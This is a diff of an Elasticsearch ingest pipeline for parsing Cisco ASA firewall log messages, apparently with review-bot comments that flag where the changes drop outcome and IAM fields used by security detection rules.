%{NOTSPACE:_temp_.cisco.source_interface}:%{IPORHOST:source.address}/%{NUMBER:source.port}(\(%{NOTSPACE:source.user.name}\))? 
to %{NOTSPACE:_temp_.cisco.destination_interface}:%{IP:destination.address}/%{NUMBER:destination.port} - dissect: if: "ctx._temp_.cisco.message_id == '313001'" + tag: parse_313001 field: "message" description: "313001" - pattern: "%{event.outcome} %{network.transport} type=%{_temp_.cisco.icmp_type}, code=%{_temp_.cisco.icmp_code} from %{source.address} on interface %{_temp_.cisco.source_interface}" + pattern: "Denied %{network.transport} type=%{_temp_.cisco.icmp_type}, code=%{_temp_.cisco.icmp_code} from %{source.address} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '313004'" + tag: parse_313004 field: "message" description: "313004" - pattern: "%{event.outcome} %{network.transport} type=%{_temp_.cisco.icmp_type}, from%{}addr %{source.address} on interface %{_temp_.cisco.source_interface} to %{destination.address}: no matching session" + pattern: "Denied %{network.transport} type=%{_temp_.cisco.icmp_type}, from%{}addr %{source.address} on interface %{_temp_.cisco.source_interface} to %{destination.address}: no matching session" - grok: if: "ctx._temp_.cisco.message_id == '313005'" + tag: parse_313005 field: "message" description: "313005" patterns: 
@@ -638,7 +572,7 @@ processors: - "No matching connection for ICMP error message: %{NOTSPACE:network.transport} src %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST}(\\(%{CISCO_USER_OR_SGT_SRC}\\))? dst %{NOTCOLON:_temp_.cisco.destination_interface}:%{IPORHOST}(\\(%{CISCO_USER_OR_SGT_DST}\\))? \\(type %{NUMBER:_temp_.cisco.icmp_type}, code %{NUMBER:_temp_.cisco.icmp_code}\\) on %{NOTCOLON} interface.%{SPACE}Original IP payload: %{NOTSPACE:input.type} src %{IPORHOST:source.address}(/%{NUMBER:source.port})? dst %{IPORHOST:destination.address}(/%{NUMBER:destination.port})?[.]?" pattern_definitions: NOTCOLON: "[^:]*" - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" CISCO_USER_OR_SGT_SRC: (?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt}|\((?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt})\)) CISCO_USER_OR_SGT_DST: (?:%{CISCO_USER:_temp_.cisco.destination_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.destination_user_or_sgt}|\((?:%{CISCO_USER:_temp_.cisco.destination_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.destination_user_or_sgt})\)) 
@@ -646,24 +580,28 @@ processors: CISCO_SGT: (?:, *)?%{NUMBER}(?::%{WORD})? - dissect: if: "ctx._temp_.cisco.message_id == '313008'" + tag: parse_313008 field: "message" description: "313008" - pattern: "%{event.outcome} %{network.transport} type=%{_temp_.cisco.icmp_type}, code=%{_temp_.cisco.icmp_code} from %{source.address} on interface %{_temp_.cisco.source_interface}" + pattern: "Denied %{network.transport} type=%{_temp_.cisco.icmp_type}, code=%{_temp_.cisco.icmp_code} from %{source.address} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '313009'" + tag: parse_313009 field: "message" description: "313009" - pattern: "%{event.outcome} invalid %{network.transport} code %{_temp_.cisco.icmp_code}, for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}" + pattern: "Denied invalid %{network.transport} code %{_temp_.cisco.icmp_code}, for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}" - dissect: if: "ctx._temp_.cisco.message_id == '322001'" + tag: parse_322001 field: "message" description: "322001" - pattern: "%{event.outcome} MAC address %{source.mac}, possible spoof attempt on interface %{_temp_.cisco.source_interface}" + pattern: "Deny MAC address %{source.mac}, possible spoof attempt on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '338001'" + tag: parse_338001 field: "message" description: "338001" - pattern: "Dynamic filter %{event.outcome} black%{}d %{network.transport} traffic from 
%{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic filter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338001'" field: "server.domain" 
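Review bot: The 338001 pattern now discards the filter verdict with `%{}` (`Dynamic filter %{} black%{}d …`) instead of capturing it, while the 106100, 106102 and 111004 processors in this same change keep theirs in `%{_temp_.outcome}`; the same `%{}` discard is used for 338002 through 338008 in the following hunks. Capturing into `%{_temp_.outcome}` would keep the message's own verdict available to the later normalisation instead of relying only on the message id, and would make these processors consistent with the rest of the change. If the id-based mapping is deliberate, a short comment on the 338001 processor, e.g. `# verdict word intentionally skipped; event.outcome is derived from message_id`, would stop the next reader from re-adding the capture.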
@@ -672,9 +610,10 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338002'" + tag: parse_338002 field: "message" description: "338002" - pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}" + pattern: "Dynamic %{}ilter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}" - set: if: "ctx._temp_.cisco.message_id == '338002'" field: "server.domain" 
@@ -683,19 +622,22 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338003'" + tag: parse_338003 field: "message" description: "338003" - pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338004'" + tag: parse_338004 field: "message" description: "338004" - pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) 
to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338005'" + tag: parse_338005 field: "message" description: "338005" - pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338005'" field: "server.domain" 
@@ -704,9 +646,10 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338006'" + tag: parse_338006 field: "message" description: "338006" - pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338006'" field: "server.domain" 
@@ -715,19 +658,22 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338007'" + tag: parse_338007 field: "message" description: "338007" - pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338008'" + tag: parse_338008 field: "message" description: "338008" - pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) 
to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338101'" + tag: parse_338101 field: "message" description: "338101" - pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}" + pattern: "Dynamic %{}ilter %{} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}" - set: if: "ctx._temp_.cisco.message_id == '338101'" field: "server.domain" 
@@ -736,9 +682,10 @@ processors:
 ignore_empty_value: true
 - dissect:
 if: "ctx._temp_.cisco.message_id == '338102'"
+ tag: parse_338102
 field: "message"
 description: "338102"
- pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}"
+ pattern: "Dynamic %{}ilter %{} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}"
 - set:
 if: "ctx._temp_.cisco.message_id == '338102'"
 field: "server.domain"
@@ -747,19 +694,22 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338103'" + tag: parse_338103 field: "message" description: "338103" - pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}" + pattern: "Dynamic %{}ilter %{} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}" - dissect: if: "ctx._temp_.cisco.message_id == '338104'" + tag: parse_338104 field: "message" description: "338104" - pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}" + pattern: "Dynamic %{}ilter %{} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}" - dissect: if: "ctx._temp_.cisco.message_id == 
'338201'" + tag: parse_338201 field: "message" description: "338201" - pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338201'" field: "server.domain" 
@@ -768,9 +718,10 @@ processors:
 ignore_empty_value: true
 - dissect:
 if: "ctx._temp_.cisco.message_id == '338202'"
+ tag: parse_338202
 field: "message"
 description: "338202"
- pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}"
+ pattern: "Dynamic %{}ilter %{} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}"
 - set:
 if: "ctx._temp_.cisco.message_id == '338202'"
 field: "server.domain"
@@ -779,9 +730,10 @@ processors:
 ignore_empty_value: true
 - dissect:
 if: "ctx._temp_.cisco.message_id == '338203'"
+ tag: parse_338203
 field: "message"
 description: "338203"
- pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}"
+ pattern: "Dynamic %{}ilter %{} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}"
 - set:
 if: "ctx._temp_.cisco.message_id == '338203'"
 field: "server.domain"
@@ -790,9 +742,10 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338204'" + tag: parse_338204 field: "message" description: "338204" - pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338204'" field: "server.domain" @@ -801,6 +754,7 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338301'" + tag: parse_338301 field: "message" description: "338301" pattern: "Intercepted DNS reply for domain %{source.domain} from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}, matched %{_temp_.cisco.list_id}" @@ -830,45 +784,38 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '502103'" + tag: parse_502103 field: "message" description: "502103" pattern: "User priv level changed: Uname: %{server.user.name} 
From: %{_temp_.cisco.privilege.old} To: %{_temp_.cisco.privilege.new}" - - append: - if: "ctx._temp_.cisco.message_id == '502103'" - field: "event.type" - description: "502103" - value: - - "group" - - "change" - - append: - if: "ctx._temp_.cisco.message_id == '502103'" - field: "event.category" - description: "502103" - value: "iam" - dissect: if: "ctx._temp_.cisco.message_id == '507003'" + tag: parse_507003 field: "message" description: "507003" pattern: "%{network.transport} flow from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} terminated by inspection engine, reason - %{message}" - dissect: if: '["605004", "605005"].contains(ctx._temp_.cisco.message_id)' + tag: parse_605004-605005 field: "message" description: "605004, 605005" - pattern: 'Login %{event.outcome} from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{network.protocol} for user "%{source.user.name}"' + pattern: 'Login %{} from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{network.protocol} for user "%{source.user.name}"' - dissect: if: "ctx._temp_.cisco.message_id == '609001'" + tag: parse_609001 field: "message" description: "609001" pattern: "Built local-host %{_temp_.cisco.source_interface}:%{source.address}" - dissect: if: "ctx._temp_.cisco.message_id == '607001'" + tag: parse_607001 field: "message" description: "607001" pattern: "Pre-allocate SIP %{_temp_.cisco.connection_type} secondary channel for %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} to %{_temp_.cisco.source_interface}:%{source.address} from %{_temp_.cisco.message} message" - grok: if: "ctx._temp_.cisco.message_id == '607001'" + tag: parse_607001_connection_type description: "607001" - tag: "grok_connection_type" field: "_temp_.cisco.connection_type" patterns: - "%{CONNECTION}" 
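Review bot: `Login %{} from` for 605004/605005 discards the permitted/denied word, and later in this diff the `set event.outcome: failure` for 605004 is deleted as well, so unless a message-id table outside this view supplies it, management-plane login failures will arrive without event.outcome, which authentication-failure detection content keys on. The same hunk drops `event.category: iam` and `event.type: [group, change]` for 502103 (user privilege level change) without a visible replacement, which is exactly the categorisation privilege-escalation rules filter on. Please point to where these are now set, or add test samples for 605004 and 502103 that assert `event.outcome` and `event.category` on the new side of the pipeline.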
@@ -876,48 +823,41 @@ processors: TRANSPORTS: "(?:UDP|TCP)" PROTOCOLS: "(?:RTP|RTCP)" CONNECTION: "(?:%{TRANSPORTS:network.transport}|%{PROTOCOLS:network.protocol})" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - dissect: if: "ctx._temp_.cisco.message_id == '609002'" + tag: parse_609002 field: "message" description: "609002" pattern: "Teardown local-host %{_temp_.cisco.source_interface}:%{source.address} duration %{_temp_.duration_hms}" - dissect: if: '["611102", "611101"].contains(ctx._temp_.cisco.message_id)' + tag: parse_611101-611102 field: "message" description: "611102, 611101" - pattern: 'User authentication %{event.outcome}: IP address: %{source.address}, Uname: %{server.user.name}' + pattern: 'User authentication %{}: IP address: %{source.address}, Uname: %{server.user.name}' - dissect: if: "ctx._temp_.cisco.message_id == '710003'" + tag: parse_710003 field: "message" description: "710003" - pattern: "%{network.transport} access %{event.outcome} by ACL from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" + pattern: "%{network.transport} access denied by ACL from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" - dissect: if: "ctx._temp_.cisco.message_id == '710005'" + tag: parse_710005 field: "message" description: "710005" - pattern: "%{network.transport} request %{event.outcome} from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" + pattern: "%{network.transport} request discarded from %{source.address}/%{source.port} to 
%{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" - grok: if: "ctx._temp_.cisco.message_id == '713049'" - tag: "grok_message_713049" + tag: parse_713049 field: "message" description: "713049" - patterns: + patterns: - "Group = %{NOTSPACE}, IP = %{IP:source.address}, Security negotiation complete for LAN-to-LAN Group (%{DATA}) %{DATA}, Inbound SPI = %{DATA}, Outbound SPI = %{DATA}" - "Group = %{NOTSPACE}, Username = %{NOTSPACE:user.name}, IP = %{IP:source.address}, Security negotiation complete for User (%{DATA}) %{DATA}, Inbound SPI = %{DATA}, Outbound SPI = %{DATA}" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - grok: if: "ctx._temp_.cisco.message_id == '716002'" + tag: parse_716002 field: "message" description: "716002" patterns: 
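Review bot: 710003 and 710005 now hard-code `denied` and `discarded` where the old patterns accepted any word, and 611101/611102 drop the Succeeded/Rejected token with `User authentication %{}:`, so a message whose wording differs will now fail the dissect rather than parse with an odd outcome, and the authentication result is no longer captured here. Since this hunk also removes the per-processor on_failure blocks (607001 connection-type grok, 713049 grok), such failures are left to the pipeline-level handler, which is outside this view; confirm it still appends `fail-{{{ _ingest.on_failure_processor_tag }}}` to error.message, otherwise the newly added `parse_*` tags give no trace of which parser broke. The `patterns:` change in the 713049 grok appears to be whitespace-only and is fine.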
